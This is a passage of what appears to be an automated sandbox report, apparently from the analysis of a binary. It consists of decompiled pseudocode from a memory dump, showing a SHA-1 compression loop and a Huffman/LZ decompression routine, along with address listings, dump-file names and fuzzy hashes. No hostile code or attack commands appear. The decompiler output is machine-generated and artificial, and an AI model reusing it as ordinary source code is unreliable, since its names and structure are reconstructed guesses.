					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}










































































































          0x001fe973
          0x001fe97f
          0x001fe98b
          0x001fe995
          0x001fe99a
          0x001fe99f
          0x001fe981
          0x001fe981
          0x001fe985
          0x001fe985
          0x001fe9a2
          0x001fe9ab
          0x001fe9ad
          0x001fe9b0
          0x001fe9ba
          0x001fe9c0
          0x001fe9c4
          0x001fe9dc
          0x001fe9e7
          0x001fe9e9
          0x001fe9eb
          0x001fe9f0
          0x001fe9f3
          0x001fe9f7
          0x001fe9fb
          0x001fe9fe
          0x001fea09
          0x001fea0e
          0x001fea28
          0x001fea2d
          0x001fea38
          0x001fea45
          0x001fea4a
          0x001fea5e
          0x001fea65
          0x001fea6f
          0x001fea7c
          0x001fea85
          0x001fea95
          0x001feaa1
          0x001feaa3
          0x001feaae
          0x001feab3
          0x001feab6
          0x001feaca
          0x001fead1
          0x001fead8
          0x001feae1
          0x001feae5
          0x001feae9
          0x001feaf4
          0x001feaf7
          0x001feafa
          0x001feb06
          0x001feb18
          0x001feb1b
          0x001feb1d
          0x001feb33
          0x001feb3b
          0x001feb3f
          0x001feb4a
          0x001feb5c
          0x001feb63
          0x001feb66
          0x001feb6c
          0x001feb6e
          0x001feb73
          0x001feb78
          0x001feb8e
          0x001feb97
          0x001feb99
          0x001feb9c
          0x001feba2
          0x001feba8
          0x001febb7
          0x001febc7
          0x001febc9
          0x001febcf
          0x001febd1
          0x001febd7
          0x001febdc
          0x001febe0
          0x001febe6
          0x001febea
          0x001febf4
          0x001febfb
          0x001fec00
          0x001fec01
          0x001fec05
          0x001fec09
          0x001fec0d
          0x001fec0d
          0x001fec0d
          0x001fec12
          0x001fec16
          0x001fec1e
          0x001fec24
          0x001fec27
          0x001fec2a
          0x001fec39
          0x001fec48
          0x001fec4a
          0x001fec4d
          0x001fec53
          0x001fec5d
          0x001fec62
          0x001fec68
          0x001fec6c
          0x001fec70
          0x001fec74
          0x001fec78
          0x001fec7d
          0x001fec90
          0x001fec9f
          0x001feca1
          0x001feca4
          0x001fecaa
          0x001fecaf
          0x001fecc2
          0x001fecc8
          0x001feccc
          0x001fecdc
          0x001fece5
          0x001fecef
          0x001fecf2
          0x001fecf4
          0x001fecfb
          0x001fed01
          0x001fed10
          0x001fed1d
          0x001fed23
          0x001fed2b
          0x001fed4c
          0x001fed4f
          0x001fed56
          0x001fed5a
          0x001fed5d
          0x001fed67
          0x001fed77
          0x001fed7c
          0x001fed84
          0x001fed9b
          0x001feda2
          0x001feda6
          0x001feda8
          0x001fedab
          0x001fedb1
          0x001fedba
          0x001fedca
          0x001fedcf
          0x001fedd6
          0x001fedda
          0x001fedde
          0x001fede9
          0x001fedea
          0x001fedf4
          0x001fedf4
          0x001fedf4
          0x001fedf7
          0x001fedfa
          0x001fee01
          0x001fee06
          0x001fee0b
          0x001fee12
          0x001fee20
          0x001fee2f
          0x001fee31
          0x001fee37
          0x001fee46
          0x001fee49
          0x001fee4c
          0x001fee4d
          0x001fee59
          0x001fee5d
          0x001fee67
          0x001fee69
          0x001fee70
          0x001fee80
          0x001fee89
          0x001fee8b
          0x001fee8e
          0x001fee9a
          0x001feea2
          0x001feea9
          0x001feeac
          0x001feeb0
          0x001feeb6
          0x001feebc
          0x001feec0
          0x001feed0
          0x001feedf
          0x001feee2
          0x001feee4
          0x001feee7
          0x001fef0b
          0x001fef14
          0x001fef17
          0x001fef19
          0x001fef1d
          0x001fef27
          0x001fef2e
          0x001fef44
          0x001fef4e
          0x001fef50
          0x001fef54
          0x001fef62
          0x001fef71
          0x001fef79
          0x001fef7e
          0x001fef85
          0x001fef9e
          0x001fefa4
          0x001fefa6
          0x001fefaa
          0x001fefb0
          0x001fefb8
          0x001fefbd
          0x001fefcd
          0x001fefd3
          0x001fefd7
          0x001fefe1
          0x00000000
          0x00000000
          0x001fedf0
          0x001fedf0
          0x001fefe9
          0x001fefea
          0x001fefee
          0x001fefee
          0x001fefee
          0x001feff3
          0x001feff7
          0x001feffc
          0x001ff001
          0x001ff006
          0x001ff008
          0x001ff00a
          0x001ff00e
          0x001ff01d
          0x001ff02c
          0x001ff02e
          0x001ff031
          0x001ff039
          0x001ff03e
          0x001ff047
          0x001ff04d
          0x001ff051
          0x001ff055
          0x001ff05c
          0x001ff05e
          0x001ff071
          0x001ff080
          0x001ff082
          0x001ff085
          0x001ff08d
          0x001ff0a0
          0x001ff0a4
          0x001ff0a8
          0x001ff0ab
          0x001ff0bb
          0x001ff0c4
          0x001ff0ce
          0x001ff0d1
          0x001ff0d3
          0x001ff0da
          0x001ff0de
          0x001ff0f3
          0x001ff0fc
          0x001ff100
          0x001ff104
          0x001ff129
          0x001ff132
          0x001ff135
          0x001ff137
          0x001ff13a
          0x001ff148
          0x001ff155
          0x001ff172
          0x001ff175
          0x001ff179
          0x001ff17b
          0x001ff17e
          0x001ff184
          0x001ff18c
          0x001ff195
          0x001ff199
          0x001ff1a2
          0x001ff1a6
          0x001ff1a8
          0x001ff1af
          0x001ff1b3
          0x001ff1bc
          0x001ff1c0
          0x001ff1c3
          0x001ff1c6
          0x001ff1c9
          0x001ff1cb
          0x001ff1d5

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
          • Instruction ID: 3ce65ffbd96706f27cde53e31ee44b83a9926ceea82062cdbc2a895513defe11
          • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
          • Instruction Fuzzy Hash: 7D5249B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002066A2, Relevance: .5, Instructions: 509COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 88%
          			E002066A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00212B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E001F6D3A(0x2300e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E001FA4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E001FA4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E001FA4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E00203564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E001FA4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E001FA4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00207D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00207D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E001FA4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E0020397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}






















































































































          0x002066a7
          0x002066ad
          0x002066b5
          0x002066dc
          0x002066df
          0x002066e5
          0x002066e8
          0x002066ea
          0x00206702
          0x00206709
          0x0020670b
          0x0020670e
          0x00206712
          0x00206717
          0x00206719
          0x0020671b
          0x0020671d
          0x0020671d
          0x0020671f
          0x00206723
          0x00206723
          0x00206725
          0x00206727
          0x00000000
          0x00000000
          0x00206729
          0x00206729
          0x0020672b
          0x00206ca2
          0x00206ca3
          0x00000000
          0x00206ca3
          0x00206731
          0x0020673f
          0x0020673f
          0x00206741
          0x00206750
          0x00206750
          0x00206756
          0x00206c9b
          0x00206c9b
          0x00000000
          0x00206c9b
          0x00000000
          0x00206756
          0x00206743
          0x0020674a
          0x00000000
          0x00000000
          0x00000000
          0x0020674a
          0x00206733
          0x00206736
          0x00206739
          0x00000000
          0x00000000
          0x00000000
          0x0020675c
          0x0020675c
          0x00206765
          0x0020676b
          0x0020676d
          0x00206770
          0x00206779
          0x0020677a
          0x00206785
          0x00206789
          0x0020678b
          0x00206792
          0x00206792
          0x00206797
          0x00206797
          0x0020679d
          0x002067a8
          0x002067af
          0x002067b3
          0x002067b9
          0x002067c0
          0x002067c6
          0x002067cc
          0x002067d0
          0x002067fd
          0x002067fe
          0x002067ff
          0x00206801
          0x0020681a
          0x0020681d
          0x00206824
          0x00206827
          0x0020682a
          0x00206832
          0x0020683b
          0x0020683f
          0x00206841
          0x00206844
          0x00206846
          0x00206846
          0x00206848
          0x00000000
          0x00206848
          0x00206806
          0x00206809
          0x00206809
          0x0020680b
          0x00000000
          0x00000000
          0x0020680d
          0x0020680e
          0x00206811
          0x00206814
          0x00000000
          0x00000000
          0x00000000
          0x00206816
          0x00206818
          0x00000000
          0x002067d2
          0x002067d4
          0x002067d7
          0x002067e1
          0x002067e9
          0x002067ee
          0x002067f1
          0x00206850
          0x00206855
          0x00206857
          0x002068a5
          0x002068ab
          0x00206b1e
          0x00206b20
          0x00206b71
          0x00206b77
          0x00206b86
          0x00206b87
          0x00206b91
          0x00206b94
          0x00206b9b
          0x00206ba1
          0x00206ba7
          0x00206bae
          0x00206bdb
          0x00206bdc
          0x00206bdd
          0x00206bdf
          0x00206bfb
          0x00206bfe
          0x00206c05
          0x00206c08
          0x00206c0b
          0x00206c16
          0x00206c22
          0x00206c24
          0x00206c2a
          0x00206c2c
          0x00206c2c
          0x00206c2e
          0x00206c36
          0x00206c36
          0x00206c39
          0x00206c3c
          0x00206c4a
          0x00206c4d
          0x00206c55
          0x00206c58
          0x00206c5a
          0x00206c5e
          0x00206c65
          0x00206c6d
          0x00206c6f
          0x00206c76
          0x00206c78
          0x00206c78
          0x00206c7b
          0x00206c7b
          0x00206c3e
          0x00206c3e
          0x00206c3e
          0x00206c82
          0x00206c86
          0x00206c86
          0x00206c8a
          0x00206c8e
          0x00206c92
          0x00206723
          0x00206723
          0x00206725
          0x00206727
          0x00000000
          0x00000000
          0x00000000
          0x00206727
          0x00206723
          0x00206be7
          0x00206bea
          0x00206bea
          0x00206bec
          0x00000000
          0x00000000
          0x00206bee
          0x00206bef
          0x00206bf2
          0x00206bf5
          0x00000000
          0x00000000
          0x00000000
          0x00206bf7
          0x00206bf9
          0x00000000
          0x00206bf9
          0x00206bb2
          0x00206bb5
          0x00206bbf
          0x00206bc7
          0x00206bcc
          0x00206bcf
          0x00000000
          0x00206bcf
          0x00206b79
          0x00206886
          0x00206886
          0x0020688a
          0x0020688e
          0x00000000
          0x0020688e
          0x00206b28
          0x00206b2a
          0x00206b34
          0x00206b3c
          0x00206b41
          0x00206b42
          0x00206b44
          0x00206b4d
          0x00206b54
          0x00206b5f
          0x00206b67
          0x00206b69
          0x00000000
          0x00206b69
          0x002068b1
          0x002068b7
          0x002068ba
          0x002068c7
          0x002068ca
          0x002068d0
          0x002068d0
          0x002068bc
          0x002068bc
          0x002068bc
          0x002068d2
          0x002068d5
          0x002068d9
          0x002068db
